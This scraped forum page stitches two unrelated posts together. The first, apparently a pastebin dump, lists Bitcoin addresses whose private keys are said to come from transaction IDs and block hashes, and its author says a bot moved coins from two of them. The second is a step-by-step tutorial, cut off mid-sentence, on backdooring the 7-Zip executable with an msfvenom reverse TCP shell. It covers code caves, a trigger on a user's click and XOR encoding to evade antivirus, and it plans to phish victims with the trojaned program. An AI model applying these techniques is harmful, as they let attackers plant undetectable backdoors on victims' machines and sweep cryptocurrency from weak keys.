1Hg9pi75XWAT9pB3faXQFKKZbh98cbM5m Sha256(1JoshVWQDa7DzXqN3wQ9dbig5WEfaAzHcM) 1PcExYX3mUJ1rwa4aTLNJUpxqRLU8MxPXm Sha256(1LTZ9kaxRHBZH43eSmZ2KoGLHHUBV3P2S5) 1J9SzdYMZFsLqunQfPAswzogLNBitbREMD Sha256(1A7grBEjor6Sapj8KRbEGj2UrbnNt1Usxo) 1FNF3xfTE53LVLQMvH6qteVqrNzwn2g2H8 Sha256(1H21ndKEuMqZbeMMCqrYArCdV8WeicGehB) 1Q2a1ytfujskCEoXBsjVi1FqKWHegfFKwD Sha256(1LzGrd5QX1rG5fk7143ps9isUTEwGyzRJE) 1PfcpvjYUGu4yvpkEHmAKgDXtsLfSNyzvV Sha256(153jMRXn251WyxT9nmJW2XDsFUJ648jyY5) 1M2uEGihcwUPiRGETE7vF8kUiS2Z4rtV2Q Sha256(1HqQBiqgFK6ChJ2Vq7kbWRCbc73cjyNXv5) 1Kka5bgXvpHTNDsPmhLPHae2qcK9mLS2qS Sha256(1E3D7NabEX971uV2gXT47rWQwPm3zbmvd8) 17hMEK4i8Nsi56huBU4i9N4Gjiw5G6X5iG Sha256(1Nk6a8ZfN86gaHJifcF8iGahx4scCKkwF5) 1DT4Q4ocUFgekXvBqBM6kFmvQYB6Y4PnHo Sha256(19aNbfFfZEWwstuy97C1GsHHELNCxZSEYV) 1CSMVivJfFynvbZRrLFHVGnehpXLUjdGRc Sha256(1p4gsrzTc3mFAgJKYqMzhm6UsJzhgy1KX) 17SaWquajZZBRF5qz6HuXMRt6gvnrDyoqE Sha256(1C1KjGATUXP6L6nnGTAh4LQcnSyLt13XyB) 16eePivj1nTVvLpBGkmFoeGxNyMU7NLbtW Sha256(1K79KaFs4D6wqz1wjP1QoYiY18fw8N3bZo) 1PF2gQPPAwQDfTrSuNX6t8J381D7s3bGFu Sha256(1J9Gtk5i6xHM5XZxQsBn9qdpogznNDhqQD) 1GSkK6KBVSycEU57iK6fRvSXYJ4dgkkuNt Sha256(1JZwnSQz64N3F9D3E24oS4oGhSxMWDsXYM) 12eGusvkCcJb2GWqFvvE1BLDJ8pVX49fQv Sha256(197HxXUSehthdqXM6aEnA1ScDSCR7tQmP3) 134Kia3XhZV6oXE4EUvjc1ES8S8CY7NioU Sha256(1PVn2gxgYB8EcjkpJshJHfDoBoG8BntZWM) 1HMGSkDB9ZhRoUbSEEG6xR7rs9iPT2Ns5B Sha256(1E4yLggKcgHcpSKX336stXWgheNU2serVz) 13qsbkaJM7TkA5F2dsvHeGVQ7kCo74eGxh Sha256(1FAv42GaDuQixSzEzSbx6aP1Kf4WVWpQUY) 1Jsz6mahqVMJn2ayWzN6TfeWTti9tqfbSM Sha256(18AsiEQoLLKaF4Co1z4rxHyzJu9oqTVbFE) 1BwjscJC3P47uW5GXR7tjeHkdXQk6CuAFb Sha256(1JuP7JXhHabGLVAqp9TJj5N171qLVHrcVq) 17kYPYbELyVfMSYihD4YETJSZq5yCs3diM Sha256(1HzJPqLEpbeXiYhyoA8M8cuuds3FEAnw3B) 1C9HtVz7H8NArfV613wQNHs4PrK2oLZEYh Sha256(1EGeEk4YUrXyDL4zNXpWdqJopoVxs2vExJ) 16bEBNuc7JQ4QzyoFAkmxdVvW4wJqicjVN Sha256(12GvGqEQuQTW4Rr8dZ1o397KAYCMGWPYkq) 141V8fK9Kuofit8AXh9SLV9N9bLTfftETA Sha256(15nXjzf8EXy8Lji3czM1HAVw14mEKoEiTw) 19cMyj9KqVq78yZe32CNhgpyuGLMwM9X8S Sha256(17FaMY613bKfwhrdTv5PHnucSGTJBcw3k5) 1CRq6nj3a7vXdJJN2YSWdW6fVwydr6kqWs Sha256(1J1ZPHbbEwgcwniH3F7AgBeFZxQXJoKCGf) 1BVNt39u32LLkxMvBeBHXXNaTJqWe1Xcu5 Sha256(17iLALAyra1W5KSUjjkGN5LeUsWdeoQQx3) 1Mpw88XWQzLTZnq1eNs5SegZYGJu5Epky8 Sha256(1LeuaozTUT5UJX6DD4Q1VJsHh6aHpZ3YRU) 1LkwU9xbVroLkH9EvxDfmMnsCikQzaUv9S Sha256(16bEpxSc1FDyQDXR7ZYKbyyDDxzyaaCnNS) 1D97u8Pet8YmNwKaCPUXLyi4zk1HnLF5RQ Sha256(137XrofaWZhaZW2uB7eDsPjcwCNMTXVLot) 1KyUNmmJu3JjauVEZQUYLUEBg48GXXS1ii Sha256(17S3XjtEFXQoGdXnUjJJtGB1D7PTa9SsLZ) 1HwxL1vutUc42ikh3RBnM4v2dVRHPTrTve Sha256(1FfmbHfnpaZjKFvyi1okTjJJusN455paPH) 137XrofaWZhaZW2uB7eDsPjcwCNMTXVLot Sha256(1JvaK7jYWFNbDsJZLarXnq1iVicFW4UBv5) 1FXi6kEJjnZUBqpwjVJKPsgVHKag86k6qq Sha256(1FEYXtchFFJft6myWc6PyxLCzgdd8EHVUK) 1Gj2uRnxDztM7dTDQEUQGfJg4z5RtAhECh Sha256(1ESkNMa9Z37of4QdJmncvibrXxZ7suPjYm) 1JhWnRjRm7AhbvSBtEifcFL8DkEKQiWRZw Sha256(13Q8rTtdGUUt8Q8ywcEffj4oiNrY6ui3cu) 131XQfvE7E1NzdRQnE8XFmtkxWVRXTsb9q Sha256(1FLeb3zCVG63NYAMBiUoqKYgW1tUwgMMfF) 167dyxowdWwBdofck3WuAwvUpVfn2ewx8Q Sha256(1FFAdm2BWoCfTkTwFLJ4o3b5xG7cuRxbWb) 1CVunYyUpeCFcGAYdHrDNrXcQFBVU8gyo9 Sha256(1BEYFim8uoJ7FAZG6m1E1hqLwKjfVwnWU1) 14XAGCAeUxieSzvGK3TX915PJLvX54n2Pd Sha256(17XQfW1R66aRBNYyJMwzn7zLf3D6sZgda3) 1M5jhEDKQCYbMCXHgcRUmaxwqYmcbrEfGD Sha256(1AixDffKCd1cV1tz1sp8fwJQDEAYCWzQcR) 1HPnYqbMvV4bGRcpSP28mMyekhjKiudcFY Sha256(1C91NNyzXE1dBC4dDKjx6y5VnhihifrpCY) 15XWgB1biKGd1JyuYecobfFtfBcVt6Jnok Sha256(1268xJ8iYUdRxK2vArkyoa5es6bR99hjhR) 1NHvPBaxKFuDec27mWcyCf7szUUvNnfimK Sha256(1LdgEzW8WhkvBxDBQHdvNtbbvdVYbBB2F1) 1AoocdeZC64PaQ15Gbv1kXyYYnN8FWXAST Sha256(1Et9zapAxsBLJ3bvY7LDTuHif5cH7mZiBE) 1NWCqz8nr8ZRZt1zEKidyWcZDyNtK3THps Sha256(17Xok12pBFkXxNcE8J4gTSm3YKkatyX4ad) 1Lv6T9RegiNHpES1DHu6AasDcUqp2SeqLb Sha256(1LDqitspsYaiLH6AMW5EzJYuZG5vTGzRNg) 16FKGvEtu5KPMZqiTK4yjmsSZsJLyxz9fr Sha256(1CRWfJdgVrfKLRS4G3vTMRhEQrCZZyHNMo) 14JpZ9Bogo4p83xt6cKS1Fh1rLSFRat8PN Sha256(1FBxoyGYaC9GEKLokfyrHUbZyoZmmm1ptJ) 1BEYFim8uoJ7FAZG6m1E1hqLwKjfVwnWU1 Sha256(1PfcpvjYUGu4yvpkEHmAKgDXtsLfSNyzvV) 1P9ZZGDG1npYd4d7jiCfPya6LQGkF5sFm7 Sha256(1LFGKkDZ21FZVsBh1A1S5Xr6aXuV3x9N4k) 1JvaK7jYWFNbDsJZLarXnq1iVicFW4UBv5 Sha256(1LdkWzq9DxopPkY1hCmQ3DezenP5PQLNC3) 15RjQKt6D4HBn87QqgbyvhKFNDDjXncp8Y Sha256(1PhmMsdwamJA6soKw5mNMXxzGomHEHWY5P) 1G7B5eVnAQgeuGrKxcRnrmEqPLsjRkgnVF Sha256(1D97u8Pet8YmNwKaCPUXLyi4zk1HnLF5RQ) 192qwAD31JB9jHiAwaTDkd6teb2hLAkY3b Sha256(1PhqA75qNM23aH9zV3uWvUhDbdwcab6q5L) 13mbvCyxCYvATNzranCkQdpCT19VGpMFZa Sha256(1F3sAm6ZtwLAUnj7d38pGFxtP3RVEvtsbV) 1HJx3CqdaHAX6ZYRBHDvM5skg2Vh7GeZBD Sha256(1KrutzZZ7rth6D9wasfGz2oy9R6k1RCL9n) 1HBsFJ9VngvMjaKZjbFhNRaegkjF9NBEe Sha256(1CVunYyUpeCFcGAYdHrDNrXcQFBVU8gyo9) 1KiGdZ9TUeWyJ3DyHj7LQLZgjvMHd6j2DZ Sha256(18SV4DVmytRDYB5JBAFkewUbVAp6FRpi5c) 13FzEhD3WpX682G7b446NFZV6TXHH7BaQv Sha256(1E1rSGgugyNYF3TTr12pedv4UHoWxv5CeD) 1LVRWmpfKKcRZcKvi5ZGWGx5wU1HCNEdZZ Sha256(1CVPe9A5xFoQBEYhFP46nRrzf9wCS4KLFm) 1HhNZhMm4YFPSFvUXE6wLYPx63BF7MRJCJ Sha256(145Sph2eiNGp5WVAkdJKg9Z2PMhTGSS9iT) 1G6qfGz7eVDBGDJEy6Jw6Gkg8zaoWku8W5 Sha256(18EF7uwoJnKx7YAg72DUv4Xqbyd4a32P9f) 1MNhKuKbpPjELGJA5BRrJ4qw8RajGESLz6 Sha256(15WLziyvhPu1qVKkQ62ooEnCEu8vpyuTR5) 18XAotZvJNoaDKY7dkfNHuTrAzguazetHE Sha256(15SP99eiBZ43SMuzzCc9AaccuTxF5AQaat) 1HamTvNJfggDioTbPgnC2ujQpCj4BEJqu Sha256(14nuZCWe76kWigUKAjFxyJLFHQyLTsKXYk) 17iqGkzW5Y7miJjd5B2gP5Eztx8kcCDwRM Sha256(1MB3L1eTnHo1nQSN7Lmgepb7iipWqFjhYX) 15M7QfReFDY2SZssyBALDQTFVV1VDdVBLA Sha256(16bjY7SynPYKrTQULjHy8on3WENxCmK4ix) 1LgwKwv9kt8BwVvn6bVWj8KcqpP9JSP1Mh Sha256(1Q81rAHbNebKiNH7HD9Mh2xtH6jgzbAxoF) 1pmZwNDZjpuAqW3LjYYQCEjbQYBtSxzWc Sha256(13PctMqzyBKi5CpZnbastHQURrSRrow4yj) 1qA59Na3WysruJbCPoomryDRCtJ4f4aLu Sha256(1HBsFJ9VngvMjaKZjbFhNRaegkjF9NBEe) 19QBydCuMiY7aRTbkP2tb3KQJUWkTrr5Xi Sha256(1JwSSubhmg6iPtRjtyqhUYYH7bZg3Lfy1T) 11EuerTwe9rxtT3T56ykX5K7J3AksPzU3 Sha256(14PnZgX8ZDABJZ8RnatkK7DQzdpkwRRPX2) 13JNB8GtymAPaqAoxRZrN2EgmzZLCkbPsh Sha256(1LGUyTbp7nbqp8NQy2tkc3QEjy7CWwdAJj) 1Ads6ZWgRbjSCZ37FUqcmk82gvup1gQurB Sha256(1NbBTJQ5azGEA1yhGnLh39fE8YoEbePpCm) 1LWU4SbnqnfctAMbtivp2L98i8hSSCm7u7 Sha256(1MVqDAJo8kbqKfTJWnbuzvfmiUXXBAmX3y) 12B1bUocw8rQefDcYNdckfSLJ6BsUwhRjT Sha256(1Pjg628vjMLBvADrPHsthtzKiryM2y46DG) 12GZz1D1kdX3Fj7M87RFvqubam8iGrK77R Sha256(1Lu49ZKmGoYmW1ji3SEqCGVyYfEw7occ86) 13wY5CtwQhd7LYprEpFpkt1g9R7ErMkAwT Sha256(1NPSWKXdnHa17NWTU3J6nVkyogZjmAh7N6) 1Kc324Y6UUMffeYdtuXgzVC28Kx3U8cqQk Sha256(1HAQB99WfrV2ttRjttUPMzRi4R1uC2ftMy) 1Gwz14Cty45h3hZ4nCEno6jSdxtQn5bc7h Sha256(1PDgY5PkpBNCZVWKKAq3cbGyqvwwN91z4g) 1L2a5n9ar7e2v3Wz6NDFnxisigvR6urGaY Sha256(1KxUVU9DKfdaTLMnXBLS5BZRf56cFnRosk) 1KwUfu3gGk7n8Wz969tAztvvM4Mp4ZY57s Sha256(12XuaKzEheWbFJBno9QiV6kPCWrnWpUYTK) 13JNB8GtymAPaqAoxRZrN2EgmzZLCkbPsh Sha256(1LGUyTbp7nbqp8NQy2tkc3QEjy7CWwdAJj) 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp Sha256(16SH69WgJCXYXWV58sxjTxonhgBh5HCZTt) 1MkaTR3642ofrstePom5bbwGHbuQJmrnGD Sha256(1BynBc2YUAoNcvZLWi24URzMvsk7CUe2rc) 114LdauSAu2FTaR2ChPsPTRRhjYD9PZzn2 Sha256(144BV4Y7tgnetk5tDKAYTGS4mjprA75zJz) 1NzWscae8v3sKmTVJYwq8yhkizK8hUS5qP Sha256(1ENCBKFsqxJVCqR2TS1WfDV3rDi6zA8J6Y) 1FjEL7TBazaJN7WyND4uwq9wiaWDzfizkP Sha256(1PeCGFsJgqz8CcjGugGq5bPBiRDXUZHLUH) 1FP8j4zUPoJkpKwYpd8zYGHVaKygRHzx3d Sha256(1ERdvKTCxP1gZvdNndLKtYotW7qpR3xhuQ) 16nXouTPm5gVedr4Betb8KRWLSBtmXGUbD Sha256(16oTV1jZPJ5wm3QLhN96xVF7DchihmpL1k) 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit Sha256(1Ca15MELG5DzYpUgeXkkJ2Lt7iMa17SwAo) My bot moved coins from the last two addresses only. (No one has claimed ownership from 16nX). All other transfers were the result of other people who either figured this out or are the ones who planted the bad addresses themselves (since 2014). And these are some recent examples of private keys that are based on other information from the blockchain itself (as stated, may be completely unrelated but still happening on a regular basis). 1LUqqMzaigWJTzaP79oxsD6zKGifokrh7p c193edeeb4e7fb5c3e01c3aebd2ec5ac13f349a5a78ca4112ab6a4cbf8e35404 txid 1FQ9AneLGfhFf9JT5m5sg5FaYFeJrGmJhS 00000000000000000045fa3492aee311171af6da7d05a76c6eaadab572dc1db9 Block Hash 1DhcPvYWBGwPFEsAJhXgdKtXX7FFGGeFVS 00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048 Block Hash 198MRUHD2cvgUTBKcnroqmoTSs4b8xyLH9 7dac2c5666815c17a3b36427de37bb9d2e2c5ccec3f8633eb91a4205cb4c10ff Markel Root 19FHVnoNYTmFAdC2VC7Az8TbCgrSWSP1ip 000000000000000000db717b4c076da2d1b9ff8ddbc94132e3a8d008a0fb62b9 Block Hash 1Lr2yEny7HYJkXdFgJ2D8zHyNH1uHMi4w4 2bedfd92a6136566bb858b2f0d223744a41a987c468356d069acc86f45bf68ac txid 1QBbjKxRk1jP36WYpFkJjgzhvVSDBMWjy2 f1599a1ced833d95a54aa38a1a64113d5f0a4db3cb613ef761180cab57155699 txid 1BFYNokepXjbb9Han2AGfSTNKNNU9vgAAn 533da7e41bd99550f63f152ef1e613f1a78e3bed12788664d536c6ec42b5e0aa txid 1MJtsgDNrrFWS3qxtrPr6BnQUdp1qPjyEm 216fb568589629b115b0ed8fc41fdf3219d9ab804c6ce5e53fbc581a88427c3f txid 14syDBvpGXS6PtWytkDJF2QACvSggEZ277 a7f4def1c7ff07d17b5dd58fc92f18ee2dbee6dc7654fd30a8653bd9d848f0a0 txid 1QBbjKxRk1jP36WYpFkJjgzhvVSDBMWjy2 f1599a1ced833d95a54aa38a1a64113d5f0a4db3cb613ef761180cab57155699 txid 1BkHAUcfrZLRLyXHiBn6XRoppPqSzuf8hE 805cd74ca322633372b9bfb857f3be41db0b8de43a3c44353b238c0acff9d523 txid 1CNgVFjAwHT7kc6uw7DGk42CXf1WbX4JQm 53d348ca871dc1205e778f4d8e66cfdadbd105782dba6688e9a0b4bdee4763e4 txid 1HjDAJiuJ8dda919xwKBqphhEwBVGfzMGt 0aad1b00a5227d9b03d33329a5a11af75c75c878a064c69b276063cbea677514 txid 1PDnrPSCw9eWTtJss4DhYoLTk4WUmZQdBi f87b08218888f97388218d3e2489962403f7eece98dd8b4733671edeb9ad1a7c txid 1MJp4z3ig498hNATfgHBAnLFhwoZpvw118 000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f Block Hash I think this information should be made public so that other backend systems plugged into crypto networks can guard against this sort of 'hide in plain sight' attack. As stated earlier, I honestly set out to look for buried treasure and stumbled upon someone else's exploit. Thanks to yt_coinartist's assistance in making this public. e8d064874c37ce44f13a880b93b548b83342c99e1530dd746322777f88397ed8 Going dark now....bye. Sursa: https://pastebin.com/jCDFcESz
-
Table of Contents [hide] 1 Introduction 2 Self Imposed Restrictions 3 Methods used: 4 Criteria for PE file selection for implanting backdoor 4.1 ASLR: 4.2 Static Analysis 5 Backdooring PE file 6 Adding a new Section header method 6.1 Hijack Execution Flow 6.2 Adding Shellcode 6.3 Modifying shellcode 6.4 Spawning shell 6.5 Pros of adding a new section header method 6.6 Cons of adding a new section header method 7 Triggering shellcode upon user interaction + Codecaves 7.1 Code Caves 7.2 Triggering Shellcode Upon user interaction 7.3 Spawning Shell 8 Custom Encoding Shellcode 8.1 Spawning shell 9 Conclusion Introduction During Penetration testing engagement you are required to backdoor a specific executable with your own shellcode without increasing the size of the executable or altering its intended functionality and hopefully making it fully undetectable (FUD) how would you do it?. For example, after recon, you gather information that a lot number of employees use a certain “program/software”. The social engineering way to get in the victim’s network would be a phishing email to employees with a link to download “Updated version of that program”, which actually is the backdoored binary of the updated program. This post will cover how to backdoor a legitimate x86 PE (Portable Executable) file by adding our own reverse TCP shellcode without increasing the size or altering the functionality. Different techniques are also discussed on how to make the backdoor PE fully undetectable (FUD). The focus in each step of the process is to make the backdoored file Fully undetectable. The word “undetectable” here is used in the context of scan time static analysis. Introductory understanding of PE file format, x86 assembly and debugging required. Each section is building upon the previous section and no topic is repeated for the sake of conciseness, one should reference back and forth for clarity. Self Imposed Restrictions Our goal is to backdoor a program in a way that it becomes fully undetectable by anti viruses, and the functionality of the backdoored program should remain the same with no interruptions/errors. For anti-virus scanning purposes we will be using NoDistribute.There are a lot of way to make a binary undetectable, using crypters that encode the entire program and include a decoding stub in it to decode at runtime, compressing the program using UPX, using veil-framework or msfvenom encodings. We will not be using any of such tools. The purpose is to keep it simple and elegant! For this reason I have the following self imposed restrictions:- No use to Msfvenom encoding schemes, crypters, veil-framework or any such fancy tools. Size of the file should remain same, which means no extra sections, decoder stubs, or compressing (UPX). Functionality of the backdoored program must remain the same with no error/interruptions. Methods used: Adding a new section header to add shellcode User interaction based shellcode Trigger + codecaves. Dual code caves with custom encoder + triggering shellcode upon user interaction Criteria for PE file selection for implanting backdoor Unless you are forced to use a specific binary to implant a backdoor the following points must be kept in mind. They are not required to be followed but preferred because they will help reducing the AV detection rate and making the end product more feasible. The file size of executable should be small < 10mb, Smaller size file will be easy to transfer to the victim during a penetration testing engagement. You could email them in ZIP or use other social engineering techniques. It will also be convenient to debug in case of issues. Backdoor a well known product, for example Utorrent, network utilities like Putty, sysinternal tools, winRAR , 7zip etc. Using a known PE file is not required, but there are more chances of AV to flag an unknown PE backdoor-ed than a known PE backdoor-ed and the victim would be more inclined to execute a known program. PE files that are not protected by security features such as ASLR or DEP. It would be complicated to backdoor those and won’t make a difference in the end product compared to normal PE files. It is preferable to use C/C++ Native binaries. It is preferable to have a PE file that has a legitimate functionality of communicating over the network. This would fool few anti viruses upon execution when backdoor shellcode will make a reverse connection to our desired box. Some anti viruses would not flag and will consider it as the functionality of the program. Chances are network monitoring solutions and people would consider malicious communication as legitimate functionality. The Program we will be backdooring is 7Zip file archiver (GUI version). Firstly lets check if the file has ASLR enabled. ASLR: Randomizes the addresses each time program is loaded in memory, this way attacker cannot used harcoded addresses to exploit flaws/shellcode placement. Powershell script result shows no ASLR or DEP security mechanism As we can see in the above screenshot, not much in terms of binary protection. Lets take a look at some other information about the 7zip binary. Static Analysis Static Analysis of 7zip binary The PE file is 32 bit binary, has a size of about 5mb. It is a programmed in native code (C++). Seems like a good candidate for our backdoor. Lets dig in! Backdooring PE file There are two ways to backdoor Portable executable (PE) files. Before demonstrating both of them separately it is important to have a sense of what do we mean by backdooring a PE file?. In simple terms we want a legitimate windows executable file like 7zip achiever (used for demonstration) to have our shellcode in it, so when the 7zip file is executed our shellcode should get executed as well without the user knowing and without the anti viruses detecting any malicious behavior. The program (7zip) should work accurately as well. The shellcode we will be using is a stageless MSFvenom reverse TCP shell. Follow this link to know the difference between staged and stageless payloads Both of the methods described below has the same overall process and goal but different approaches to achieve it. The overall process is as follow:- Find an appropriate place in memory for implanting our shell code, either in codecaves or by creating new section headers, both methods demonstrated below. Copy the opcodes from stack at the beginning of program execution. Replace those instructions with our own opcodes to hijack the execution flow of the application to our desired location in memory. Add the shellcode to that memory location which in this case is stageless TCP reverse shell. Set the registers back to the stack copied in first step to allow normal execution flow. Adding a new Section header method The idea behind this method is to create a new header section in PE file, add our shellcode in newly created section and later point the execution flow it that section. The new section header can be created using a tool such as LordPE. Open Lord PE Go to section header and add the section header (added .hello) at the bottom. Add the Virtual size and Raw size 1000 bytes. Note that 1000 is in hexadecimal (4096 bytes decimal). Make the section header executable as we have to place our Shellcode in this section so it has to be executable, writable and readable. Save the file as original. Adding a new header section Now if we execute the file, it wont work because we have added a new section of 1000h bytes, but that header section is empty. Binary not executing because of empty header section To make to file work normally as intended, we have to add 1000h bytes at the end of the file because right now the file contains a header section of 1000 bytes but that section is empty, we have to fill it up by any value, we are filling it up by nulls (00). Use any hex editor to add 1000 hexademical bytes at the end of the file as shown below. Adding 1000h bytes at the end of the file We have added null values at the end of the file and renamed it 7zFMAddedSection.exe. Before proceeding further we have to make sure now our executable 7zFMAddedSection.exe, is working properly and our new section with proper size and permissions is added, we can do that in Ollydbg by going to memory section and double clicking PE headers. PE Headers in Ollydbg Hijack Execution Flow We can see that our new section .hello is added with designated permissions. Next step is to hijack the execution flow of the program to our newly added .hello section. When we execute the program it should point to .hello section of the code where we would place our shellcode. Firstly note down the first 5 opcodes, as will need them later when restoring the execution flow back. We copy the starting address of .hello section 0047E000 open the program in Ollydbg and replace the first opcode at address 004538D8 with JMP to 0047E000. Replacing the starting address with JMP to new section Right click -> Copy to executable -> all modifications -> Save file. We saved the file as 7zFMAddedSectionHijacked.exe (File names getting longer and we are just getting started!) Up-till now we have added a new header section and hijacked the execution flow to it. We open the file 7zFMAddedSectionHijacked.exe in Ollydbg. We are expecting execution flow to redirect to our newly added .hello section which would contain null values (remember we added nulls using hexedit?). Starting of .hello section Sweet! We have a long empty section .hello section. Next step is to add our shellcode from the start of this section so it gets triggered when the binary is executed. Adding Shellcode As mentioned earlier we will be using Metasploit’s stagless windows/shell_reverse_tcp shellcode. We are not using any encoding schemes provided by msfvenom, most of them if not all of them are already flagged by anti viruses. To add the shellcode firstly we need push registers on to the stack to save their state using PUSHAD and PUSHFD opcodes. At the end of shellcode we pop back the registers and restore the execution flow by pasting initial (Pre hijacked) program instructions copied earlier and jumping back to make sure the functionality of 7zip is not disturbed. Here is the sequence of instructions PUSHAD PUSHFD Shellcode.... POPAD POPFD Restore Execution Flow... We generate windows stageless reverse shellcode using the following arguments in mfsvenom msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.128 LPORT=8080 -a x86 --platform windows -f hex Copy the shellcode and paste the hex in Ollydbg as right click > binary > binary paste , it will get dissembled to assembly code. Added shellcode at the start of .hello section Modifying shellcode Now that we have our reverse TCP shellcode in .hello section its time to save the changes to file, before that we need to perform some modifications to our shellcode. At the end of the shellcode we see an opcode CALL EBP which terminates the execution of the program after shellcode is executed, and we don’t want the program execution to terminate, infact we want the program to function normally after the shellcode execution, for this reason we have to modify the opcode CALL EBP to NOP (no operation). Another modification that needs to be made is due to the presence of a WaitForSingleObject in our shellcode. WaitForSignleObject function takes an argument in milliseconds and wait till that time before starting other threads. If the WaitForSignleObject function argument is -1 this means that it will wait infinite amount of time before starting other threads. Which simply means that if we execute the binary it will spawn a reverse shell but normal functionality of 7zip would halt till we close our reverse shell. This post helps in finding and fixing WaitForSignleObject. We simply need to modify opcode DEC INC whose value is -1 (Arugment for WaitForSignleObject) to NOP. Next we need to POP register values off the stack (to restore the stack value pre-shellcode) using POPFD and POPAD at the end of shellcode. After POPFD and POPAD we need to add the 5 hijacked instructions(copied earlier in hijack execution flow) back, to make sure after shellcode execution our 7zip program functions normally. We save the modifications as 7zFMAddedSectionHijackedShelled.exe Spawning shell We setup a listener on Kali Box and execute the binary 7zFMAddedSectionHijackedShelled.exe. We get a shell. 7zip binary works fine as well with no interruption in functionality. We got a shell! How are we doing detection wise? Detection Rate Not so good!. Though it was expected since we added a new writeable, executable section in binary and used a known metasploit shellcode without any encoding. Pros of adding a new section header method You can create large section header. Large space means you don’t need to worry about space for shellcode, even you can encode your shellcode a number of times without having to worry about its size. This could help bypassing Anti viruses. Cons of adding a new section header method Adding a new section header and assigning it execution flag could alert Anti viruses. Not a good approach in terms of AV detection rate. It will also increase the size of original file, again we wouldn’t want to alert the AV or the victim about change of file size. High detection rate. Keeping in mind the cons of new section header method. Next we will look at two more methods that would help help us achieve usability and low detection rate of backdoor. Triggering shellcode upon user interaction + Codecaves What we have achieved so far is to create a new header section, place our shellcode in it and hijack the execution flow to our shellcode and then back to normal functionality of the application. In this section we will be chaining together two methods to achieve low detection rate and to mitigate the shortcomings of new adder section method discussed above. Following are the techniques discussed:- How to trigger our shellcode based on user interaction with a specific functionality. How to find and use code caves. Code Caves Code caves are dead/empty blocks in a memory of a program which can be used to inject our own code. Instead of creating a new section, we could use existing code caves to implant our shellcode. We can find code caves of different sizes in almost of any PE. The size of the code cave does matter!. We would want a code cave to be larger than our shellcode so we could inject the shellcode without having to split it in smaller chunks. The first step is to find a code cave, Cave Miner is an optimal python script to find code caves, you need to provide the size of the cave as a parameter and it will show you all the code caves larger than that size. finding code caves for injection We got two code caves larger than 700 bytes, both of them contain enough space for our shellcode. Note down the virtual address for both caves. Virtual address is the starting address of the cave. Later We will hijack the execution flow by jumping to the virtual addresses. We will be using both caves later, for now, we only require one cave to implant in our shellcode. We can see that the code cave is only readable, we have to make it writable and executable for it to execute our shellcode. We do that with LORDPE. Making .rsrc writeable and executable Triggering Shellcode Upon user interaction Now that we have a code cave we can jump to, we need to find a way to redirect execution flow to our shellcode upon user interaction. Unlike in the previous method, we don’t want to hijack the execution flow right after the program is run. We want to let the program run normally and execute shellcode upon user interaction with a specific functionality, for example clicking a specific tab. To accomplish this we need to find reference strings in the application. We can then hijack the address of a specific reference string by modifying it to jump to code cave. This means that whenever a specific string is accessed in memory the execution flow will get redirected to our code cave. Sounds good? Let see how do we achieve this. Open the 7zip program in Ollydbg > right click > search for > all reference text strings Found a suitable reference string In reference strings we found an interesting string, a domain (http://www.7-zip.org). The memory address of this domain gets accessed when a user clicks on about > domain. Website button functionality Note that we can have multiple user interaction triggers that can be backdoored in a single program using the referenced strings found. For the sake of an example we are using the domain button on about page which upon click opens the website www.7-zip.org in browser. Our objective is to trigger shellcode whenever a user clicks on the domain button. Now we have to add a breakpoint at the address of domain string so that we can then modify its opcode to jump to our code cave when a user clicks on the website button.We copy the address of domain string 0044A8E5 and add a breakpoint. We then click on the domain button in the 7zip program. The execution stops at the breakpoint as seen in the below screenshot:- Execution stops at break point address 0044A8E5 (http;//www.7zip.org/) now we can modify this address to jump to code cave, so when a user clicks on the website button execution flow would jump to our code cave, where in next step we will place our shellcode. Firstly we copy couple of instructions after 0044A8E5 address as they will be used again when we want to point execution flow back to it after shellcode execution to make sure normal functionality of 7zip. inject backdoor into exe After modification to jmp 00477857 we save the executable as 7zFMUhijacked.exe . Note that the address 00477857 is the starting address of codecave 1. We load the 7zFMUhijacked.exe in Ollydbg and let it execute normally, we then click on the website button. We are redirected to an empty code cave. Nice! we have redirected execution flow to code cave upon user interaction. To keep this post concise We will be skipping the next steps of adding and modifying the shellcode as these steps are the same explained above “6.2 Adding shellcode” and “6.3 Modifying shellcode“. Spawning Shell We add the shellcode, modify it, restore the execution flow back to from where we hijacked it 0044A8E5 and save the file as 7zFMUhijackedShelled.exe. The shellcode used is stageless windows reverse TCP. We set a netcat listener, run 7zFMUhijackedShelled.exe , click on the website button. Fully Undetectable backdoor PE Files Everything worked as we expected and we got a shell back! . Lets see how are we doing detection wise? Triggering shellcode upon user interaction + Codecaves detection. Thats good! we are down from 16/36 to 3/38. Thanks to code caves and triggering shellcode upon user interaction with a specific functionality. This shows a weakness in detection mechanism of most anti viruses as they are not able to detect a known msfvenom shellcode without any encoding just because it is in a code cave and triggered upon user interaction with specific functionality. The detection rate 3/38 is good but not good enough (Fully undetectable). Considering the self imposed restrictions, the only viable route from here seem to do custom encoding of shellcode and decode it in memory upon execution. Custom Encoding Shellcode Building upon what we previously achieved, executing shellcode from code cave upon user interaction with a specific program functionality, we now want to encode the shellcode using XOR encoder. Why do we want to use XOR, a couple of reasons, firstly it is fairly easy to implement, secondly we don’t have to write a decoder for it because if you XOR a value 2 times, it gives you the original value. We will encode the shellcode with XOR once and save it on disk. Then we will XOR the encoded value again in memory at runtime to get back the original shellcode. Antiviruses wouldn’t be able to catch it because it is being done in memory! We require 2 code caves for this purpose. One for shellcode and one for encoder/decoder. In finding code caves section above we found 2 code caves larger than 700 bytes both of them have fair enough space for shellcode and encoder/decoder. Below is the flow chart diagram of execution flow. Custom encoding shellcode in code caves + Triggering shellode upon user interaction So we want to hijack the program execution upon user interaction of clicking on the domain button to CC2 starting address 0047972e which would contain the encoder/decoder XOR stub opcodes, it will encode/decode the shellcode that resides in CC1 starting address 00477857, after CC2 execution is complete we will jump to CC1 to start execution which would spawn back a shell, after CC2 execution we will jump back from CC2 to where we initially hijacked the execution flow with clicking the domain button to make sure the functionality of the 7zip program remains the same and the victim shouldn’t notice any interruptions. Sounds like a long ride, Lets GO! Note that the steps performed in the last section wouldn’t be repeated so reference back to hijacking execution upon user interaction, adding shellcode in codecaves, modifying shellcode and restoring the execution flow back to where we hijacked it. Firstly we Hijack the execution flow from address 0044A8E5 (clicking domain button) to CC2 starting address 0047972e and save the modifications as file on disk. We run the modified 